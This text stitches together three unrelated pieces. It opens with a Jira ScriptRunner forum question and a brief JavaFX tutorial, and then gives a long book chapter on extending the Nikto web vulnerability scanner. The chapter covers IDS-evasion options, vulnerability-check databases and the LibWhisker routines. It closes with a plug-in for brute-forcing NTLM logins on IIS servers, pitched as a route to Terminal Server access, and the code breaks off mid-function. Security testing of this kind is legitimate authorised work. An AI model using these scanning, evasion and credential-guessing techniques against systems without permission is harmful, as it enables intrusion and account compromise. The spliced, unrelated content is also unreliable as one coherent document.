fetch("/$CLI{root}/","GET",""); if (($result{'www-authenticate'} eq "") || ($result{'www-authenticate'} !~ /^ntlm/i)){ #we don't do anything for these cases return; } my @CREDS=load_creds("$NIKTO{plugindir}/ntlm.db"); Next, the CREDS array is populated from the results of load_creds( ) , which is defined outside of nikto_ntlm( ). The load_creds( ) routine parses the ntlm.db file and returns an array of arrays containing the credentials that will be used: sub load_creds{ my @CREDS; my $FILE=shift; open(IN,"<$FILE") || die nprint("Can't open $FILE:$!"); my @contents=<IN>; close(IN); foreach my $line (@contents) { chomp($line); if ($line =~ /^\#/) { next; } if ($line =~ /\#/) { $line=~s/\#.*$//; $line=~s/\s+$//; } if ($line eq "") { next; } my @t=parse_csv($line); if($#t == 1){ push(@CREDS,[$t[0],$t[1],undef]); nprint("Loaded: $t[0] -- $t[1]","d"); }elsif($#t == 2){ push(@CREDS,[@t]); nprint("Loaded: $t[2]\\$t[0] -- $t[1]","d"); }else{ nprint("Parse error in ntlm.db[".join(",",@t)."]"); } } return @CREDS; } As you do with other plug-ins, you need an easy way to store and edit the input data for the plug-in, and a typical Nikto database file fits this purpose well. The format for our initial test ntlm.db file is as follows: #VERSION,1.00 #LASTMOD,07.01.2004 ########################################### # format: <Username>,<Password>,[NT Domain] ########################################### "admin","admin","TESTDOMAIN" "administrator","administrator" "guest","guest" "test","test" "testuser","testpass" "backup","backup" Now it's time to code the main loop, which will conduct a dictionary-style attack by iterating through the CREDS array and attempting to authenticate with the values from CREDS until it finds a working set of credentials: foreach my $i (0 .. $#CREDS){ nprint("+ trying $CREDS[$i][0] -- $CREDS[$i][1]","v"); LW::auth_set_header("NTLM",\%request,$CREDS[$i][0],$CREDS[$i][1]); # set NTLM auth creds LW::http_fixup_request(\%request); LW::http_do_request(\%request,\%result); # test auth if ($result{'www-authenticate'} eq ""){#found valid credentials $VULS++; #increment nikto's global "vulnerabilities found" counter if($CREDS[$i][2]){ nprint("+ NTLM Auth account found user:$CREDS[$i][2]\\$CREDS[$i][0] pass:$CREDS[$i][1]"); }else{ nprint("+ NTLM Auth account found user:$CREDS[$i][0] pass:$CREDS[$i][1]"); } last; } }#end foreach return; }1; When finished, save the file as nikto_ntlm.plugin in the plugins/ directory. Now let's try it out on an example IIS 5.0 server. The output in the following paragraphs is from a server previously scanned with a standard Nikto scan. Nikto reported the "backup" directory as being protected by NTLM authentication. Now try the plug-in using our slightly modified version of Nikto for testing. C:\tools\nikto_1.32_test>perl nikto.pl -h 10.1.1.12 -root /backup -verbose -***** SSL support not available (see docs for SSL install instructions) ***** --------------------------------------------------------------------------- - Nikto 1.32/1.19 - V: - Testing open ports for web servers V: - Checking for HTTP on port 10.1.1.12:80 + Target IP: 10.1.1.12 + Target Hostname: 10.1.1.12 + Target Port: 80 + Start Time: Sun Aug 15 21:55:22 2004 --------------------------------------------------------------------------- - Scan is dependent on "Server" string which can be faked, use -g to override + Server: Microsoft-IIS/5.0 V: + trying admin -- admin V: + trying administrator -- administrator V: + trying guest -- guest V: + trying test -- test V: + trying testuser -- testpass V: + trying backup -- backup + NTLM Auth account found user:backup pass:backup + 1 host(s) tested Great! Everything seems to work as expected. To use this plug-in as part of the standard Nikto run, uncomment the lines in nikto.pl and revert the plug-in order file, making sure to leave the line for the new plug-in. The plug-in will run only if NTLM authentication is enabled on the web server because a check was added at the top to verify this before the main brute-forcing routine. Writing a Standalone Plug-in to Attack Lotus Domino Lotus Domino servers are commonly deployed for directory and email services. Many versions of the Domino web server ship with world-readable database files with the extension .nsf. These files can contain sensitive information such as password hashes, and at the very least they are a source of information leakage. Of particular interest is the names directory database. If read permissions are enabled on this database, a user—even possibly an unauthenticated user—can view configuration information for the Domino server and domain. The list of users and the paths to their email databases is particularly dangerous. Using this information, an attacker can attempt to view an email database file via an HTTP request to the Domino mail server. If the mail database's permissions are incorrect, the attacker will have read access to that user's email via the web browser! To summarize: combining weak default security permissions with server misconfiguration yields access to a user's email, and in some cases this is possible without authentication. Using these techniques you can write a Nikto plug-in to exploit these vulnerabilities. This plug-in is going to be different from the other standard Nikto plug-ins because it is intended to work in a standalone manner. The first step in setting it up is to make some of the same modifications to the nikto.pl file that you made for the last plug-in. Comment out test_target(), set_scan_items( ), and check_responses( ) around line 100 in nikto.pl, and nikto_plugin_order.txt will be modified so that the only uncommented entry is nikto_domino. As you did with the first plug-in, you will use a .db file for the plug-in's data source. As mentioned before, the misconfigured permissions on the names database allow us to view all the users associated with a specific mail server. By using the Java applet menu that appears when names.nsf is loaded, you can navigate to Configuration→ Messaging→ Mail Users, select a mail server that is accessible via HTTP(S), and get a listing of the users and their mail files. By default, only 30 users are listed at a time, but by manipulating the GET parameter Count you can view up to 1,000 users at a time. Use this trick to list large numbers of users per request, and fill the .db file with the informational lines as they are listed in the web browser. When finished, you'll have a list of users, displayed twice per line, along with their mail files. Here are some sample lines from our .db file: Aaron J Lastname/NA/Manufacturing_Company Aaron J Lastname/NA/Manufacturing_Company@Manufacturing_Company mailsrv54\awoestem9011.nsf Adam Ant/NA/Manufacturing_Company Adam Ant/NA/Manufacturing_Company@Manufacturing_Company mailsrv58\apanzer2315.nsf Our attack strategy is simple: make an HTTP request to OpenView each user's email database file. If the request succeeds the ACL allows read access; otherwise, the ACL is configured correctly. Our next step is to write a routine to process the .db file and extract the email databases: sub load_users { my @MAILFILES; my $AFILE=shift; open(IN,"<$AFILE") || die nprint("Can't open $AFILE:$!"); my @file=<IN>; close(IN); foreach my $line (@file){ chomp($line); next if ($line eq ""); my @arr = split(/\s/,$line); next if @arr[-1] !~ /\.nsf/i; @arr[-1] =~ tr/\x5c/\x2f/; push(@MAILFILES, @arr[-1]); nprint("Loaded: " . @MAILFILES[-1], "d"); } return @MAILFILES; } The load_users( ) routine does some normalization for the path separator and avoids erroneous entries by adding only .nsf entries. Now write the main loop to request the individual mail files: sub nikto_dominousers { my @MAILFILES=load_users("$NIKTO{plugindir}/domino.users.db"); foreach my $USERFILE (@MAILFILES){ #example.com/mailsrv54/ataylor.nsf/($Inbox)?OpenView ($RES, $CONTENT) = fetch("/$USERFILE".'/($Inbox)?OpenView',"GET",""); nprint("request for $USERFILE returned $RES","d"); if( $RES eq 200 ){ if($CONTENT !~ /No documents found/i){ nprint("+ Found open ACLs on mail file: ". $USERFILE . " - inbox has contents!"); }else{ nprint("+ Found open ACLs on mail file: ". $USERFILE); } } } } The code is simple and straightforward and relies on the core Nikto routine fetch( ) to do the work. You should notice the regular expression that matches on No documents found. This helps us immediately identify inboxes with unread email. Now the plug-in is complete! Be sure to run it to test it out. The following is an example of the output you can expect to see: [notroot]$ ./nikto.pl -h --------------------------------------------------------------------------- - Nikto 1.32/1.27 - + Target IP: 192.168.3.169 + Target Hostname: + Target Port: 80 + Start Time: Thu Jan 16 17:25:13 2004 --------------------------------------------------------------------------- - Scan is dependent on "Server" string which can be faked, use -g to override + Server: Lotus-Domino + Found bad ACLs on mail file: mailsrv54/aodd5221.nsf + Found bad ACLs on mail file: mailsrv56/heng3073.nsf + Found bad ACLs on mail file: mailsrv54/skape7782.nsf - inbox has contents! + Found bad ACLs on mail file: mailsrv58/optyx2673.nsf - inbox has contents! + Found bad ACLs on mail file: mailsrv56/iller4302.nsf + Found bad ACLs on mail file: mailsrv58/ackie3165.nsf ...
http://commons.oreilly.com/wiki/index.php?title=Network_Security_Tools/Modifying_and_Hacking_Security_Tools/Writing_Plug-ins_for_the_Nikto_Vulnerability_Scanner&redirect=no
CC-MAIN-2014-42
refinedweb
5,959
57.37
This page describes how to change the Dataproc image version used by your Cloud Data Fusion instance. Before you begin Stop all real-time pipelines and Replication jobs in the Cloud Data Fusion instance. If a real-time pipeline or replication is running when you change the Dataproc image version, the changes will not be applied to the pipeline execution. For real-time pipelines, if checkpointing is enabled, the stopping of these pipelines does not cause any data loss. For Replication jobs, as long as the database logs are available, stopping and starting the Replication job does not cause data loss. Console Go to the Cloud Data Fusion Instances page (in CDAP, click View Instances) and open the instance where you need to stop a pipeline. Open each real-time pipeline in the Pipeline Studio and click Stop. Open each Replication job on the Replicate page and click Stop. REST API To retrieve all pipelines, use the following REST API call: GET -H "Authorization: Bearer ${AUTH_TOKEN}" \ "${CDAP_ENDPOINT}/v3/namespaces/NAMESPACE_ID/apps" Replace NAMESPACE_IDwith the name of your namespace. To stop a real-time pipeline, use the following REST API call: POST -H "Authorization: Bearer ${AUTH_TOKEN}" \ "${CDAP_ENDPOINT}/v3/namespaces/NAMESPACE_ID/apps/PIPELINE_NAME/spark/DataStreamsSparkStreaming/stop" Replace NAMESPACE_ID with the name of your namespace and PIPELINE_NAME with the name of the real-time pipeline. To stop a Replication job, use the following REST API call: POST -H "Authorization: Bearer ${AUTH_TOKEN}" \ "${CDAP_ENDPOINT}/v3/namespaces/NAMESPACE_ID/apps/REPLICATION_JOB_NAME/workers/DeltaWorker/stop" Replace NAMESPACE_ID with the name of your Namespace and REPLICATION_JOB_NAME with the name of the Replication job. For more information, see stopping real-time pipelines and stopping Replication jobs. Check and override the default version of Dataproc in Cloud Data Fusion In the Google Cloud console, go to the Instances page (in CDAP, click View Instances) and open the instance. Click System Admin > Configuration > System Preferences. If a Dataproc image is not specified in System Preferences, or to change the preference, click Edit System Preferences. Enter the following text in the Key field: system.profile.properties.imageVersion Enter the desired Dataproc image in the Value field, such as 1.5-debian10. Click Save & Close. This change affects the entire Cloud Data Fusion instance, including all its Namespaces and pipeline runs, unless the image version property is overridden in a Namespace, pipeline, or Runtime Argument in your instance. Change Dataproc image version in a Namespace or Pipeline Runtime Argument If you have not overridden the Dataproc image version in Namespace Preferences or in Pipeline Runtime Arguments, you can skip these steps. Namespace Preferences If you have overridden the image version in your Namespace properties, follow these steps: Open your instance in the Cloud Data Fusion UI. Click System Admin > Configuration > Namespaces. Open each namespace and click Preferences. Make sure that there is no override with key system.profile.properties.imageVersionwith an incorrect image version value. Click Finish. Pipeline Runtime Arguments If you have overridden the image version with a property in your pipeline's Runtime Arguments, follow these steps: Open your instance in the Cloud Data Fusion UI. Click > List and select the desired pipeline.Pipeline The pipeline opens on the Pipeline Studio page. Click the dropdown menunext to Run. Runtime Arguments window opens. Make sure that there is no override with key system.profile.properties.imageVersionand incorrect image version value. Click Save. Recreate static Dataproc clusters used by Cloud Data Fusion with desired image version If you use existing Dataproc clusters with Cloud Data Fusion, follow the Dataproc guide to recreate the clusters with the desired Dataproc image version for your Cloud Data Fusion version. If there are any pipelines running when the cluster is being recreated, the pipelines will fail. Subsequent runs should run on the recreated cluster. Alternatively, you can create a new Dataproc cluster with the desired Dataproc image version and delete and recreate the compute profile in Cloud Data Fusion with the same compute profile name and updated Dataproc cluster name. This way, running batch pipelines can complete execution on the existing cluster and new pipeline runs will take place on the new Dataproc cluster. You can delete the old Dataproc cluster after you have confirmed that all pipeline runs have completed. Check that the Dataproc image version is updated Console In the Google Cloud console, go to the Dataproc Clusters page. Open the Cluster details page for the new cluster that Cloud Data Fusion created when you specified the new version. The Image version field has the new value that you specified in Cloud Data Fusion. REST API Get the list of clusters with their metadata: GET -H "Authorization: Bearer ${AUTH_TOKEN}" \ Replace the following: NAMESPACE_IDwith the name of your namespace REGION_IDwith the name of the region where your clusters are located Under that JSON object, see the image in config > softwareConfig > imageVersion.
https://cloud.google.com/data-fusion/docs/support/troubleshooting-dataproc-image
CC-MAIN-2022-21
refinedweb
804
53
Idempotent requests for Flask applications Project description Flask-Idempotent is an exceedingly simple (by design) idempotent request handler for Flask. Implemented as an extension, using Redis as both a lock and response datastore for speed and ease of use and implementation, this will help you simply add idempotency to any endpoint on your Flask application. Installation $ pip install flask-idempotent Usage from flask import Flask my_app = Flask(__name__) Idempotent(my_app) <form> {{ idempotent_input() }} <!-- the rest of your form --> </form> And thats it! (well, if the defaults work for you) How it Works Any request that includes __idempotent_key in the request arguments or post data, or X-Idempotent-Key in the request’s headers will be tracked as a idempotent request. This only takes effect for 240 seconds by default, but this is configurable. When the first request with a key comes in, Flask-Idempotent will attempt to set IDEMPOTENT_{KEY} in redis. It will then process the request like normal, saving the response in redis for future requests to return. It also uses Redis’ pub/sub infrastructure to send a notification to any other requests with the same key. Any subsequent (simultaneous or otherwise) requests will fail to set this key in Redis, as its already set. They will then wait for a pub/sub notification that the master request has finished, retrieve the prior response, and return that. Why should I care? You can’t trust user input. Thats rule one of web development. This won’t beat malicious attempts to attack your form submissions, but it will help when a user submits a page twice, or an api request is sent twice, due to network failure or otherwise. This will prevent those double submissions and any subsequent results of them. Configuration Flask-Idempotent requires Redis to function. It defaults to using redis on the local machine, and the following configuration values are available. Just set them in your flask configuration # The Redis host URL REDIS_URL = 'redis://some-host:6379/' # In seconds, the timeout for a slave request to wait for the first to # complete IDEMPOTENT_TIMEOUT = 60 # In seconds, the amount of time to store the master response before # expiration in Redis IDEMPOTENT_EXPIRE = 240 Project details Download files Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
https://pypi.org/project/Flask-Idempotent/
CC-MAIN-2021-17
refinedweb
387
52.7
Toit definitions Library A library is a code unit developers can import. There is a one-to-one relationship between a Toit file and a library. Libraries can be imported with the import clause. SDK libraries The SDK comes with libraries documented in the Toit standard libraries browser. The core module is automatically imported into every file. It contains common classes, like int, string, or List. Terms Locals: a variable which is either declared within the function or is an argument passed to a function, where it is received as a parameter. Globals: a variable declared outside the scope of a function or class. Globals are initialized at first access, and remain alive until the end of the program. Constants are a special case of globals, defined with a ::=assignment. By convention they have an ALL_CAPS_NAME (see Toit globals and constants). Within a class, the following items are available: constructors, statics, factories, fields, methods. - Constructor: a way to construct an object of the given type, always defined by the constructorkeyword. See more details here. - Named constructors allow more than one constructor with the same signature, and often make code more readable. See more details here. For example, in the string class we have a constructor called constructor.from_rune rune/int. Thus, when reading the instantiation point x := string.from_rune 'X'it is clear that we construct a string with the character 'X'. - A Factory is a constructor or named constructor with a return. See an example below and more details here. - Static functions and fields: Static functions and fields are tied to the class rather than individual objects. Inside a class, static fields and functions are marked with the keyword static. Constructors and factories are implicitly static. Static fields are often constants - which can be inferred from their capitalized names, and whether they are final (defined with ::=). Inside a class, you can refer to static entries directly. Outside the class, static entries must be prefixed with the class name. class A: static some_static_field := 499 foo: // Inside the class, static entries can be referred to // directly. print some_static_field main: // But outside the class, they must be referred to through // the class name: print A.some_static_field - Methods and instance fields: everything that needs to go through an object. Methods without arguments behave similarly to instance fields. // Implicitly static, not inside a class, and doesn't // require one. foo: print "foo" // Implicitly static, can be accessed without a class. some_global := 499 // A static constant. CONSTANT ::= 42 class A: // Static, as you can write `A` without creating an `A` // first. constructor: ... // Static, or just a different way to write a constructor. constructor.named: ... // A factory is just a constructor with a `return`. From // the outside there is no difference to a constructor. constructor.my_factory: return singleton // A static field. static singleton ::= A // A static function that doesn't require the creation of // an object `A`. It's important to see that // `A.static_in_A` doesn't first create `A` and then call // `static_in_A`. The leading `A.` is just so we can find // the static function. static static_in_A: print "static fun" // Same as for the static function: this is a field that // lives independent of an instance. // If you write `A.static_field = 1` followed by `print // A.static_field`, then you would get `1`. Static fields // are really just like scoped globals. static static_field := 42 // This non-static method can only be used on an object, // like `a := A` followed by `a.method`. method: print "method" // An instance field. // Operates on an object: `a := A` followed by `a.field = // 42` would change the field of the object. A new, // unmodified, object would again be constructed with // 11 in this field: `a2 := A` followed by `print a2.field` // would print 11. field := 11 main: // Statics can be accessed directly or must be prefixed // with the class name: foo // Calls foo print some_global // Prints the global print CONSTANT // Prints the constant. a := A // Creates a new A. a2 := A.named // Creates a new A. a3 := A.my_factory // From the outside the same syntax as // `A.named`. A.static_in_A // Calls the static function *without* // creating an object first. A.static_field = 11 // Does *not* create an object first. print A.static_field // Prints the static field 11. a.method // Invokes the instance method on `a`. a2.method // Invokes it on `a2`. print a.field // Reads the field in `a`. => 11 a.field = 42 // Only changes the field in `a`, but // not a2 or a3. print a.field // => 42 print a2.field // => 11 Type Toit is optionally typed. That is, it is possible, but not required, to annotate variable declarations with types. A variable is typed if it is followed by a / and a type name. For example, foo x/y means the function foo takes a variable x with type y. By default types are non-nullable, which means null is not a valid value. class Coordinate: // An instance field that must be initialized by // constructors. // By writing `:= ?` we indicate that all constructors // must initialize the field. x /int := ? y /int := ? // We don't need to specify the type for constructor // arguments that are written directly to a typed field. constructor .x .y: main: a := Coordinate 0 0 // Error! The types of the fields (and therefore the // constructor arguments) are non-nullable, so null is not // a valid argument here: b := Coordinate null null // Error! If we want a nullable type, we write a question mark ? after the type name. For example in the following Foo class the bar variable can be a reference to an instance of the Bar class or interface, but it can also be null, which also happens to be the initial value: Any The type name corresponds to the class or interface name of all accepted values. In addition, Toit has any (for every possible type) and none (when no value is accepted). For example, in the following example rename from/any to/any -> any , the function rename takes 2 arguments: foo of type any and to of type any. any is a special type meaning “any” type. It means that the code really works for any input type or that the type-info is missing. The -> indicates the return type of the function, so foo -> bar means that the function foo returns bar. The rename function in the example rename from/any to/any -> any returns any. In the following example the parameter param, the local my_var, and the global glob are all typed in the following example: foo param/int: // The parameter 'param' must be of type int. // The variable 'my_var' is typed as 'float'. The second // '/' is a division. my_var /float := param / 3.14 glob /string := "the global 'glob' is typed as string" The type of variable is enforced by the Virtual Machine. Every time a value is stored in the variable, the VM checks that the type is correct. If it isn't, a runtime exception is thrown. Types are also very helpful during development: the IDE can use the typing information to provide code completion, or warnings when types don't match. Return types Functions can also declare their return type by writing -> followed by the return type. The -> type can be anywhere in the signature, but it's convention to put it at the end of the line that declares the name of a function: // A function that doesn't return anything. foo -> none: print "not returning anything" // A function that takes an int and returns an int. bar x/int -> int: return x + 1 gee with/string -> float // Returns a float. arguments / int on / string different / bool --lines: return 3.14 None The return type none is never needed, as Toit can see whether a method returns something or not. It can, however, help readability of code, and prevent developers from accidentally returning a value. When to Write Types? In a correct program types don't have any effect. As such they are most important during the development process. Similar to comments, there isn't always a clear-cut rule on when to write code. Different teams don't always agree on the "best" amount of types. We recommend to write types for fields, and in function signatures (parameters and return type). This dramatically improves the development experience as the IDE can use those types to suggest code completions. This is especially true for functions and variables that are intended to be used by different developers. As a general guideline: more users of your code implies you need more types. Local variables often don't need explicit types as the IDE can often figure out the type of local variables. If the IDE can't infer the type it is a judgment call whether the type is warranted or not.
https://docs.toit.io/language/definitions
CC-MAIN-2022-40
refinedweb
1,460
67.25
fdstream-problem using ImproveCascade&OpenCascade51 Hi, I've got an problem using ImproveCascade with OpenCascade51. When compiling the draw-workspace I get the error: Draw_Main.cxx ..\..\inc\fdstream.hpp(90) : error C2512: 'basic_ostream ..\..\inc\fdstream.hpp(90) : error C2614: 'fdostream' : illegal member initialization: 'ostream' is not a base or member ..\..\inc\fdstream.hpp(109) : error C2258: illegal pure syntax, must be '= 0' ..\..\inc\fdstream.hpp(109) : error C2252: 'pbSize' : pure specifier can only be specified for functions ..\..\inc\fdstream.hpp(110) : error C2258: illegal pure syntax, must be '= 0' ..\..\inc\fdstream.hpp(110) : error C2252: 'bufSize' : pure specifier can only be specified for functions ..\..\inc\fdstream.hpp(111) : error C2065: 'bufSize' : undeclared identifier ..\..\inc\fdstream.hpp(111) : error C2065: 'pbSize' : undeclared identifier ..\..\inc\fdstream.hpp(111) : error C2057: expected constant expression ..\..\inc\fdstream.hpp(111) : warning C4200: nonstandard extension used : zero-sized array in struct/union ..\..\inc\fdstream.hpp(179) : error C2229: class 'boost::fdistream' has an illegal zero-sized array I'm using VC++6.0 and the fdstream.hpp from the linked site. (BTW. fixed the problem with the 'flush'-variable in 5.1 by renaming it to 'aflush'. So I think that coulden't be the problem!? ) Thanks for any help!! Ciao hhahn Re: fdstream-problem using Hm, with VC6 I would recommend using STLPort. Perhaps this helps. But I'm not sure if ImproveCascade works with 5.1 Patrik Re: fdstream-problem using Hi, just downloaded STL-port and tried it. Still the same error! Id compiled the lib's, put the stlport folder in my include-path ( first-place ) and the lib folder in my lib path. Is there anything I missed? Ciao hhahn Re: fdstream-problem using Hi again, I don't see any clear answers from looking at your compiler output and the fdstream.hpp file. I've never tried using fdstream.hpp with Visual Studio 6.0. You could try making a separate little one-file project and #include "fdstream.hpp" to see if it compiles under 6.0 when separated from Open Cascade. It seems strange to me that the fdstream.hpp code uses "std::" in front of everything, but your first error message just says "basic_ostream" has no default constructors instead of saying "std::basic_ostream". I'm pretty sure with MSVS .NET and later, it prints the full namespace qualifier in the error messages, I don't remember if MSVS 6.0 did that or not. Perhaps Open Cascade 5.1 #defines some macros that are interfering with fdstream.hpp? Hopefully they didn't "#define std", i.e. define std to be nothing, or something crazy like that... Unfortunately I won't be able to take a look at this myself until later next week. Let me know if you discover anything else. -- Conrad Re: fdstream-problem using Hi, I just want to give you an update on the issue. I'd made the test you suggested ( testproject, which includes fdstream ), I wasn't able to compile the project, so it seems it's an VC++6.0 problem. Compiling OpenCascade5.0 give's me the same error, so it definitely not an OC Problem. Sorry for causing the confusion! Thanks for your help! Ciao hhahn Re: fdstream-problem using Hi! Just got some emails from people with the same problem, asking for help. Havn't found a good solution jet, and I'm not sure if I understand enough C++-internals to fix the problem. The workaround I'm using is to avoid the "using namespace ..." directive. Just include the headerfile the normal way. I know it's a bit akward, because you always has to put std:: in front of every declaration ( std::vector aVector; ). It was anounced the nextversion of OCC will support newSTL headers. So I'm waiting ;-) Any other solution is welcome! Ciao Holger
https://www.opencascade.com/content/fdstream-problem-using-improvecascadeopencascade51
CC-MAIN-2017-22
refinedweb
639
61.53
perlman gods <HR> <P> <H1><A NAME="NAME">NAME</A></H1> <P> perlmod - Perl modules (packages and symbol tables) <P> <HR> <H1><A NAME="DESCRIPTION">DESCRIPTION</A></H1> <P> <HR> <H2><A NAME="Packages">Packages</A></H2> <P> Perl provides a mechanism for alternative namespaces to protect packages from stomping on each other's variables. In fact, there's really no such thing as a global variable in Perl (although some identifiers default to the main package instead of the current one). The package statement declares the compilation unit as being in the given namespace. The scope of the package declaration is from the declaration itself through the end of the enclosing block, [perlfunc:eval|eval], [perlfunc:sub|sub], or end of file, whichever comes first (the same scope as the <CODE>my()</CODE> and <CODE>local()</CODE> operators). All further unqualified dynamic identifiers will be in this namespace. <FONT SIZE=-1>A</FONT> package statement only affects dynamic variables--including those you've used <CODE>local()</CODE> on--but <EM>not</EM> lexical variables created with <CODE>my().</CODE> is assumed. That is, <CODE>$::sail</CODE> is equivalent to <CODE>$main::sail</CODE>. <P> The old package delimiter was a single quote, but double colon is now the preferred delimiter, in part because it's more readable to humans, and in part because it's more readable to <STRONG>emacs</STRONG> macros. It also makes <FONT SIZE=-1>C++</FONT> programmers feel like they know what's going on--as opposed to using the single quote as separator, which was there to make Ada programmers feel like they knew what's going on. Because the old-fashioned syntax is still supported for backwards compatibility, if you try to use a string like <CODE>"This is $owner's house"</CODE>, you'll be accessing <CODE>$owner::s</CODE>; that is, the <A HREF="perlop.html#item__s">$s</A> variable in package <CODE>owner</CODE>, which is probably not what you meant. Use braces to disambiguate, as in <CODE>"This is ${owner}'s house"</CODE>. <P> Packages may be nested inside other packages: <CODE>$OUTER::INNER::var</CODE>. This implies nothing about the order of name lookups, however. All symbols are either local to the current package, or must be fully qualified from the outer package name down. For instance, there is nowhere within package <CODE>OUTER</CODE> that <CODE>$INNER::var</CODE> refers to <CODE>$OUTER::INNER::var</CODE>. It would treat package <CODE>INNER</CODE> as a totally separate global package. <P> Only identifiers starting with letters (or underscore) are stored in a package's symbol table. All other symbols are kept in package <CODE>main</CODE>, including all of the punctuation variables like $_. In addition, when unqualified, the identifiers <FONT SIZE=-1>STDIN,</FONT> <FONT SIZE=-1>STDOUT,</FONT> <FONT SIZE=-1>STDERR,</FONT> <FONT SIZE=-1>ARGV,</FONT> <FONT SIZE=-1>ARGVOUT,</FONT> <FONT SIZE=-1>ENV,</FONT> <FONT SIZE=-1>INC,</FONT> and <FONT SIZE=-1>SIG</FONT> are forced to be in package <CODE>main</CODE>, even when used for other purposes than their builtin one. Note also that, if you have a package called [perlman:perlop], [perlman:perlop], or [perlman:perlop], then you can't use the qualified form of an identifier because it will be interpreted instead as a pattern match, a substitution, or a transliteration. <P> (Variables beginning with underscore used to be forced into package main, but we decided it was more useful for package writers to be able to use leading underscore to indicate private variables and method names. <CODE>$_</CODE> is still global though.) <P> <CODE>Eval()ed</CODE> strings are compiled in the package in which the <CODE>eval()</CODE> was compiled. (Assignments to <CODE>$SIG{}</CODE>, however, assume the signal handler specified is in the <CODE>main</CODE> package. Qualify the signal handler name if you wish to have a signal handler in a package.) For an example, examine <EM>perldb.pl</EM> in the Perl library. It initially switches to the <CODE>DB</CODE> package so that the debugger doesn't interfere with variables in the script you are trying to debug. At various points, however, it temporarily switches back to the <CODE>main</CODE> package to evaluate various expressions in the context of the <CODE>main</CODE> package (or wherever you came from). See [perlman:perldebug|the perldebug manpage]. <P> The special symbol <CODE>__PACKAGE__</CODE> contains the current package, but cannot (easily) be used to construct variables. <P> See [perlman:perlsub|the perlsub manpage] for other scoping issues related to <CODE>my()</CODE> and <CODE>local(),</CODE> and [perlman:perlref|the perlref manpage] regarding closures. <P> <HR> <H2><A NAME="Symbol_Tables">Symbol Tables</A></H2> <P> The symbol table for a package happens to be stored in the hash of that name with two colons appended. The main symbol table's name is thus <CODE>%main::</CODE>, or <CODE>%::</CODE> for short. Likewise symbol table for the nested package mentioned earlier is named <CODE>%OUTER::INNER::</CODE>. <P> The value in each entry of the hash is what you are referring to when you use the <CODE>*name</CODE> typeglob notation. In fact, the following have the same effect, though the first is more efficient because it does the symbol table lookups at compile time: <P> <PRE> local *main::foo = *main::bar; local $main::{foo} = $main::{bar}; </PRE> <P> You can use this to print out all the variables in a package, for instance. The standard <EM>dumpvar.pl</EM> library and the <FONT SIZE=-1>CPAN</FONT> module Devel::Symdump make use of this. <P> Assignment to a typeglob performs an aliasing operation, i.e., <P> <PRE> *dick = *richard; </PRE> <P> causes variables, subroutines, formats, and file and directory handles accessible via the identifier <CODE>richard</CODE> also to be accessible via the identifier <CODE>dick</CODE>. If you want to alias only a particular variable or subroutine, you can assign a reference instead: <P> <PRE> *dick = \$richard; </PRE> <P> Which makes <CODE>$richard</CODE> and <CODE>$dick</CODE> the same variable, but leaves <CODE>@richard</CODE> and <CODE>@dick</CODE> as separate arrays. Tricky, eh? <P> This mechanism may be used to pass and return cheap references into or from subroutines if you won't want to copy the whole thing. It only works when assigning to dynamic variables, not lexicals. <P> <PRE> %some_hash = (); # can't be my() *some_hash = fn( \%another_hash ); sub fn { local *hashsym = shift; # now use %hashsym normally, and you # will affect the caller's %another_hash my %nhash = (); # do what you want return \%nhash; } </PRE> <P> On return, the reference will overwrite the hash slot in the symbol table specified by the <CODE>*some_hash</CODE> typeglob. This is a somewhat tricky way of passing around references cheaply when you won't want to have to remember to dereference variables explicitly. <P> Another use of symbol tables is for making ``constant'' scalars. <P> <PRE> *PI = \3.14159265358979; </PRE> <P> Now you cannot alter <FONT SIZE=-1>$PI,</FONT> which is probably a good thing all in all. This isn't the same as a constant subroutine, which is subject to optimization at compile-time. This isn't. <FONT SIZE=-1>A</FONT> constant subroutine is one prototyped to take no arguments and to return a constant expression. See [perlman:perlsub|the perlsub manpage] for details on these. The <CODE>use constant</CODE> pragma is a convenient shorthand for these. <P> You can say <CODE>*foo{PACKAGE}</CODE> and <CODE>*foo{NAME}</CODE> to find out what name and package the <CODE>*foo</CODE> symbol table entry comes from. This may be useful in a subroutine that gets passed typeglobs as arguments: <P> <PRE> sub identify_typeglob { my $glob = shift; print 'You gave me ', *{$glob}{PACKAGE}, '::', *{$glob}{NAME}, "\n"; } identify_typeglob *foo; identify_typeglob *bar::baz; </PRE> <P> This prints <P> <PRE> You gave me main::foo You gave me bar::baz </PRE> <P> The *foo{THING} notation can also be used to obtain references to the individual elements of *foo, see [perlman:perlref|the perlref manpage]. <P> <HR> <H2><A NAME="Package_Constructors_and_Destruc">Package Constructors and Destructors</A></H2> <P> There are two special subroutine definitions that function as package constructors and destructors. These are the <CODE>BEGIN</CODE> and <CODE>END</CODE> routines. The [perlfunc:sub|sub] is optional for these routines. <P> <FONT SIZE=-1>A</FONT> <CODE>BEGIN</CODE> subroutine is executed as soon as possible, that is, the moment it is completely defined, even before the rest of the containing file is parsed. You may have multiple <CODE>BEGIN</CODE> blocks within a file--they will execute in order of definition. Because a <CODE>BEGIN</CODE> block executes immediately, it can pull in definitions of subroutines and such from other files in time to be visible to the rest of the file. Once a <CODE>BEGIN</CODE> has run, it is immediately undefined and any code it used is returned to Perl's memory pool. This means you can't ever explicitly call a <CODE>BEGIN</CODE>. <P> An <CODE>END</CODE> subroutine is executed as late as possible, that is, when the interpreter is being exited, even if it is exiting as a result of a <CODE>die()</CODE> function. (But not if it's polymorphing into another program via [perlfunc:exec|exec], or being blown out of the water by a signal--you have to trap that yourself (if you can).) You may have multiple <CODE>END</CODE> blocks within a file--they will execute in reverse order of definition; that is: last in, first out <FONT SIZE=-1>(LIFO).</FONT> <P> Inside an <CODE>END</CODE> subroutine, <CODE>$?</CODE> contains the value that the script is going to pass to [perlfunc:exit|exit()]. You can modify <CODE>$?</CODE> to change the exit value of the script. Beware of changing <CODE>$?</CODE> by accident (e.g. by running something via [perlfunc:system|system]). <P> Note that when you use the <STRONG>-n</STRONG> and <STRONG>-p</STRONG> switches to Perl, <CODE>BEGIN</CODE> and <CODE>END</CODE> work just as they do in <STRONG>awk</STRONG>, as a degenerate case. As currently implemented (and subject to change, since its inconvenient at best), both <CODE>BEGIN</CODE> <EM>and</EM> <CODE>END</CODE> blocks are run when you use the <STRONG>-c</STRONG> switch for a compile-only syntax check, although your main code is not. <P> <HR> <H2><A NAME="Perl_Classes">Perl Classes</A></H2> <P> There is no special class syntax in Perl, but a package may function as a class if it provides subroutines to act as methods. Such a package may also derive some of its methods from another class (package) by listing the other package name in its global <CODE>@ISA</CODE> array (which must be a package global, not a lexical). 